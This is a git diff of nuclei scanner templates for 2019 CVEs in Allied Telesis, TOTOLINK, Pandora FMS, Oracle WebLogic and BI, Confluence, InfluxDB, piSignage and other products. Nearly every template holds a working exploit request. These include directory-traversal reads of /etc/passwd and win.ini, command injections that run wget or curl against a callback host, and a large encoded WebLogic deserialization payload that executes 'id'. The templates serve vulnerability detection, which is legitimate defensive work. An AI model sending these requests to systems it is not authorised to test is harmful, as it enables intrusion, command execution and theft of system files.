https://packetstormsecurity.com/files/155504/Allied-Telesis-AT-GS950-8-Directory-Traversal.html - - https://www.cvedetails.com/cve/CVE-2019-18922 - - https://pastebin.com/dpEGKUGz - - http://seclists.org/fulldisclosure/2019/Nov/31 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-18922 - cwe-id: CWE-22 - tags: cve,cve2019,allied,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-19368.yaml b/nuclei-templates/CVE-2019/CVE-2019-19368.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-19368.yaml rename to nuclei-templates/CVE-2019/CVE-2019-19368.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-19824.yaml b/nuclei-templates/CVE-2019/CVE-2019-19824.yaml deleted file mode 100644 index 15cf1f3024..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-19824.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2019-19824 - -info: - name: TOTOLINK - Remote Code Execution - author: gy741 - severity: high - description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0. - reference: - - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-19824 - - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits - - https://sploit.tech - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-19824 - cwe-id: CWE-78 - tags: cve,cve2019,totolink,rce,router - -requests: - - raw: - - | - POST /boafrm/formSysCmd HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46cGFzc3dvcmQ= - Content-Type: application/x-www-form-urlencoded - - submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2019/CVE-2019-20085.yaml b/nuclei-templates/CVE-2019/CVE-2019-20085.yaml deleted file mode 100644 index eba6f7c080..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-20085.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2019-20085 - -info: - name: TVT NVMS 1000 - Directory Traversal - author: daffainfo - severity: high - description: TVT NVMS-1000 devices allow GET /.. Directory Traversal - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 - - https://www.exploit-db.com/exploits/48311 - - https://www.exploit-db.com/exploits/47774 - - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-20085 - cwe-id: CWE-22 - tags: cve,cve2019,iot,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini" - - matchers-condition: and - matchers: - - type: regex - regex: - - "\\[(font|extension|file)s\\]" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-20224.yaml b/nuclei-templates/CVE-2019/CVE-2019-20224.yaml new file mode 100644 index 0000000000..b7a2d0559b --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-20224.yaml @@ -0,0 +1,48 @@ +id: CVE-2019-20224 +info: + name: Pandora FMS 7.0NG - Remote Command Injection + author: ritikchaddha + severity: high + description: | + Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. + reference: + - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ + - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 + - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 + - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view + remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-20224 + cwe-id: CWE-78 + tags: pandorafms,rce,cve,cve2019,authenticated,oast +requests: + - raw: + - | + POST /pandora_console/index.php?login=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + nick=admin&pass=admin&login_button=Login + - | + POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/CVE-2019-20354.yaml b/nuclei-templates/CVE-2019/CVE-2019-20354.yaml new file mode 100644 index 0000000000..ac3941c763 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-20354.yaml @@ -0,0 +1,18 @@ +id: CVE-2019-20354 +info: + author: "pikpikcu" + name: "piSignage 2.6.4 Directory Traversal" + severity: High + #Source:-https://github.com/colloqi/piSignage/issues/97 +requests: + - raw: + - "GET /api/settings/log?file=../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 277\nConnection: close\nReferer: {{Hostname}}\n \n" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2019/CVE-2019-20933.yaml b/nuclei-templates/CVE-2019/CVE-2019-20933.yaml new file mode 100644 index 0000000000..c690a67121 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-20933.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-20933 +info: + name: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret + author: c-sh0 + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + - https://github.com/influxdata/influxdb/issues/12927 + - https://github.com/c-sh0/security/blob/master/influxdb.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-20933 + cwe-id: CWE-287 + tags: cve,cve-2019,influxdb,auth-bypass +requests: + - method: GET + path: + - "{{BaseURL}}/query?q=SHOW%20DATABASES" + headers: + Authorization: Bearer {{token}} + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - '"results":' + - '"name":"databases"' + condition: and diff --git a/nuclei-templates/CVE-2019/CVE-2019-2588.yaml b/nuclei-templates/CVE-2019/CVE-2019-2588.yaml new file mode 100644 index 0000000000..493bd571df --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-2588.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-2588 + +info: + name: Oracle Business Intelligence - Path Traversal + author: madrobot + severity: medium + description: | + Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0 are vulnerable to path traversal in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). + reference: + - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-2588 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N + cvss-score: 4.9 + cve-id: CVE-2019-2588 + tags: cve,cve2019,oracle,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini" + matchers-condition: and + matchers: + - type: word + words: + - 'for 16-bit app support' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/14 diff --git a/nuclei-templates/CVE-2019/CVE-2019-2616.yaml b/nuclei-templates/CVE-2019/CVE-2019-2616.yaml deleted file mode 100644 index f6c8aa1ffb..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-2616.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-2616 -info: - name: XXE in Oracle Business Intelligence and XML Publisher - author: pdteam - severity: high - description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - - https://www.exploit-db.com/exploits/46729 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cve-id: CVE-2019-2616 - tags: cve,cve2019,oracle,xxe,oast,kev -requests: - - raw: - - | - POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Type: text/xml; charset=UTF-8 - - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2019/CVE-2019-2725.yaml b/nuclei-templates/CVE-2019/CVE-2019-2725.yaml deleted file mode 100644 index da4e9c6462..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-2725.yaml +++ /dev/null @@ -1,62 +0,0 @@ -id: CVE-2019-2725 - -info: - name: Oracle WebLogic Server - Remote Command Execution - author: dwisiswant0 - severity: critical - description: | - The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. - reference: - - https://paper.seebug.org/910/ - - https://www.exploit-db.com/exploits/46780/ - - https://www.oracle.com/security-alerts/cpujan2020.html - - https://nvd.nist.gov/vuln/detail/CVE-2019-2725 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-2725 - cwe-id: CWE-74 - epss-score: 0.97542 - tags: kev,edb,cve,cve2019,oracle,weblogic,rce - metadata: - max-request: 2 - -http: - - raw: - - | - POST /wls-wsat/CoordinatorPortType HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 - Content-Type: text/xml - cmd: id - - oracle.toplink.internal.sessions.UnitOfWorkChangeSet-84-19051151140231069711897461171161051084676105110107101100729711510483101116-40108-4190-107-35423020012011401710697118974611711610510846729711510483101116-7068-123-107-106-72-735230012011211912000166364000002115114058991111094611511711046111114103469711297991041014612097108971104610511011610111411097108461201151081169946116114971204684101109112108971161011157310911210898779-63110-84-855130973013951051101001011101167811710998101114730149511611497110115108101116731101001011209002195117115101831011141181059910111577101991049711010511510976025959799991011151156912011610111411097108831161211081011151041011011161160187610697118974710897110103478311611410511010359760119597117120671089711511510111511605976991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947114117110116105109101477297115104116979810810159910109598121116101991111001011151160391916691069599108971151151160189176106971189747108971101034767108971151155976059511097109101113012604760179511111711611211711680114111112101114116105101115116022761069711897471171161051084780114111112101114116105101115591201120000-1-1-1-1011603971081081121171140391916675-32521103103-37552001201120002117114029166-84-1323-86884-32200120112001429-54-2-70-66000500-70100303470-727037703810161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015-8332-109-13-111-35-176210660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151019831161179884114971101151081011168097121108111971001012731101101011146710897115115101115105376121115111115101114105971084711297121108111971001154711711610510847719710010310111611536831161179884114971101151081011168097121108111971005910911611497110115102111114109101144076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977599176991111094711511711047111114103479711297991041014712010910847105110116101114110971084711510111410597108105122101114478310111410597108105122971161051111107297110100108101114594186108100111991171091011101161045769911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699476879775910810497110100108101114115106691769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910106912099101112116105111110115703910-904076991111094711511711047111114103479711297991041014712097108971104710511011610111411097108471201151081169947687977597699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145941861081051161011149711611111410537699111109471151171104711111410347971129799104101471201091084710511011610111411097108471001161094768847765120105115731161011149711611111459107104971101001081011141065769911110947115117110471111141034797112979910410147120109108471051101161011141109710847115101114105971081051221011144783101114105971081051229711610511111072971101001081011145910108311111711499101701051081011012719710010310111611546106971189712010011704010511211151111151011141059710847112971211081119710011547117116105108477197100103101116115368311611798841149711011510810111680971211081119710010649911110947115117110471111141034797112979910410147120971089711047105110116101114110971084712011510811699471141171101161051091014765981151161149799116841149711011510810111610201069711897471051114783101114105971081051229798108101105799111109471151171104711111410347971129799104101471209710897110471051101161011141109710847120115108116994784114971101151081011166912099101112116105111110103112111511111510111410597108471129712110811197100115471171161051084771971001031011161151086099108105110105116621016106971189747108971101034784104114101971007042101399117114114101110116841041141019710010204041761069711897471089711010347841041141019710059120440451004304610271191019810811110310599471191111141074769120101991171161018410411410197100704810141031011166711711411410111011687111114107102940417611910198108111103105994711911111410747871111141076510097112116101114591205005110049052104411910198108111103105994711510111411810810111647105110116101114110971084783101114118108101116821011131171011151167310911210870541039910910080561091031011167210197100101114103840761069711897471089711010347831161141051101035941761069711897471089711010347831161141051101035912058059100550601011103101116821011151121111101151011049404176119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011168210111511211111011510173109112108591206206310055064103716675806610451191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111682101115112111110115101731091121087068102011510111667104971149799116101114691109911110010511010310214076106971189747108971101034783116114105110103594186120700711006907210221031011168310111411810810111679117116112117116831161141019710910534041761191019810811110310599471151011141181081011164710511011610111411097108478310111411810810111679117116112117116831161141019710973109112108591207407510069076103511910198108111103105994712010910847117116105108478311611410511010373110112117116831161141019710970781022106971189747108971101034783116114105110103661171021021011147080100810341069711211210111010010444076106971189747108971101034783116114105110103594176106971189747108971101034783116114105110103661171021021011145912083084100810851053258321310808710811611183116114105110103102040417610697118974710897110103478311611410511010359120890901008109112010071100790931049119101981081111031059947115101114118108101116471051101161011141109710847831011141181081011167911711611211711683116114101971097310911210870951011119114105116101831161141019710910244076106971189747105111477311011211711683116114101971095941861209709810096099105102108117115104120101011100960102107111115461109710910180104101610697118974710897110103478312111511610110970106101110310111680114111112101114116121120108059100107010910161069711897471089711010347831161141051101037011110111161117611111910111467971151011201130901001120114103119105110801161089911111011697105110115102740761069711897471089711010347671049711483101113117101110991015941901201180119100112012010171069711897471089711010347821171101161051091017012210101031011168211711011610510910110214041761069711897471089711010347821171101161051091015912012401251001230126107991091003247993280-12810410112010199103940761069711897471089711010347831161141051101035941761069711897471089711010347801141119910111511559120-1260-1251001230-12410114798105110471151043245993280-12210221069711897471051114766117102102101114101100821019710010111470-120102510697118974710511147731101121171168311611410197109821019710010111470-11810171069711897471089711010347801141119910111511570-116101410310111673110112117116831161141019710910234041761069711897471051114773110112117116831161141019710959120-1140-113100-1150-11210424076106971189747105111477311011211711683116114101971095976106971189747108971101034783116114105110103594186120100-110100-1170-10910194076106971189747105111478210197100101114594186120100-107100-1190-10610080-1041081141019710076105110101120-102090100-1190-10110910310111687114105116101114102340417610697118974710511147801141051101168711410511610111459120-990-98100690-97101910697118974710511147801141051101168711410511610111470-95105119114105116101120-93071100-940-9210191069711897471089711010347691209910111211610511111070-901031111171161021761069711897471051114780114105110116831161141019710959120-880-87901070-861019106971189747108971101034784104114111119979810810170-84100-8309110191069711897471051114780114105110116831161141019710970-81107112114105110116108110120-79071100-800-781015112114105110116831169799107841149799101120-76011100-830-751013831169799107779711284979810810110291211151111151011141059710847801191101011145253525156514952505556575750103176121115111115101114105971084780119110101114525352515651495250555657575059033020301040102605060107000208040101001101012000470101000542-7301-79000201300060100047014000120100050150-710001019020020120006300030001-79000201300060100052014000320300010150-710000010210220100010230240202500040102601019027020120007300040001-79000201300060100056014000420400010150-710000010210220100010280290200010300310302500040102608041011010120011140701100118-8903176-72047-64049-74053-640551857-7406177-72047-64049-74053-64055-7406578451867-7407345-74077584254-6907989-6908189-7308244-740861888-74086-74092-73094-740100254-74010318105-7201105852551-91016255-74011518117-740121-10206-89033-720127-6908189-7308218-127-7408644-74086-74092-740-123586-89030-720127-6908189-7308218-121-7408644-74086-74092-740-123586-690-11989-690-11789256-740-1111867-730-108-730-105587158818-103589-89025-6908189-73082259-74086258-74086-74092589257-740-100895881-90-1-3145-740-96259-740-91-890245810-780-852510-740-82-740-772510-740-74-8903-79010940-70-40-89010-7300070093-10109060570112706970967011200229-402670-115-203270-119701127011221-102306057011270697096701120170-8920020320002033017000100102035016091171130126013001-44-54-2-70-6600050027100302170237024702510161151011141059710886101114115105111110857368101741013671111101151169711011686971081171015113-26105-1860109712410660105110105116621034041861046711110010110157610511010178117109981011148497981081011018761119997108869711410597981081018497981081011041161041051151037011111110127311011010111467108971151151011151037761211151111151011141059710847112971211081119710011547117116105108477197100103101116115367011111159101083111117114991017010510810110127197100103101116115461069711897120100117026103512111511111510111410597108471129712110811197100115471171161051084771971001031011161153670111111101610697118974710897110103477998106101991161020106971189747105111478310111410597108105122979810810110311211151111151011141059710847112971211081119710011547117116105108477197100103101116115033020301040102605060107000208010101001101012000470101000542-7301-79000201300060100060014000120100050150180002019000202001700010010202201609112116048011911011411211910120115125000102910697118971204612010910846116114971101151021111141094684101109112108971161011151201140231069711897461089711010346114101102108101991164680114111120121-3139-3832-521667-53201760110411603776106971189747108971101034711410110210810199116477311011811199971161051111107297110100108101114591201121151140501151171104611410110210810199116469711011011111697116105111110466511011011111697116105111110731101181119997116105111110729711010010810111485-54-111521-53126-912027601210910110998101114869710811710111511601576106971189747117116105108477797112597604116121112101116017761069711897471089711010347671089711511559120112115114017106971189746117116105108467297115104779711257-38-63-612296-47302700101081119710070979911611111473091161041141011151041111081001201126364000001211980001600011160810253975397544856113012609120118114029106971189712046120109108461161149711011510211111410946841011091121089711610111500000000000120112120 - - - | - POST /wls-wsat/CoordinatorPortType HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 - Content-Type: text/xml - - xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7ResultBaseExecidconnectionHandlertrue - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "uid=" - - "gid=" - - "groups=" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-3396.yaml b/nuclei-templates/CVE-2019/CVE-2019-3396.yaml new file mode 100644 index 0000000000..eee51fae30 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-3396.yaml @@ -0,0 +1,43 @@ +id: CVE-2019-3396 + +info: + name: Atlassian Confluence Server - Path Traversal + author: harshbothra_ + severity: critical + description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection. + reference: + - https://github.com/x-f1v3/CVE-2019-3396 + - https://nvd.nist.gov/vuln/detail/CVE-2019-3396 + - https://jira.atlassian.com/browse/CONFSERVER-57974 + - http://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-3396 + cwe-id: CWE-22 + epss-score: 0.97503 + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm + +http: + - raw: + - | + POST /rest/tinymce/1/macro/preview HTTP/1.1 + Host: {{Hostname}} + Referer: {{Hostname}} + + {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "contextConfigLocation" + +# Enhanced by mp on 2022/05/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-3799.yaml b/nuclei-templates/CVE-2019/CVE-2019-3799.yaml deleted file mode 100644 index 167e2d5f81..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-3799.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2019-3799 - -info: - name: Spring-Cloud-Config-Server Directory Traversal - author: madrobot - severity: medium - description: Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. - reference: - - https://github.com/mpgn/CVE-2019-3799 - - https://pivotal.io/security/cve-2019-3799 - - https://www.oracle.com/security-alerts/cpuapr2022.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2019-3799 - cwe-id: CWE-22 - tags: cve,cve2019,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - 'root:.*:0:0:' - part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-3912.yaml b/nuclei-templates/CVE-2019/CVE-2019-3912.yaml new file mode 100644 index 0000000000..72ca79216b --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-3912.yaml @@ -0,0 +1,28 @@ +id: CVE-2019-3912 + +info: + name: LabKey Server < 18.3.0 - Open redirect + author: 0x_Akoko + severity: medium + description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites. + reference: + - https://www.tenable.com/security/research/tra-2019-03 + - https://www.cvedetails.com/cve/CVE-2019-3912 + tags: cve,cve2019,redirect,labkey + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-3912 + cwe-id: CWE-601 + +requests: + - method: GET + + path: + - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com' + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/nuclei-templates/CVE-2019/cve-2019-3929.yaml b/nuclei-templates/CVE-2019/CVE-2019-3929.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-3929.yaml rename to nuclei-templates/CVE-2019/CVE-2019-3929.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-7219.yaml b/nuclei-templates/CVE-2019/CVE-2019-7219.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-7219.yaml rename to nuclei-templates/CVE-2019/CVE-2019-7219.yaml diff --git 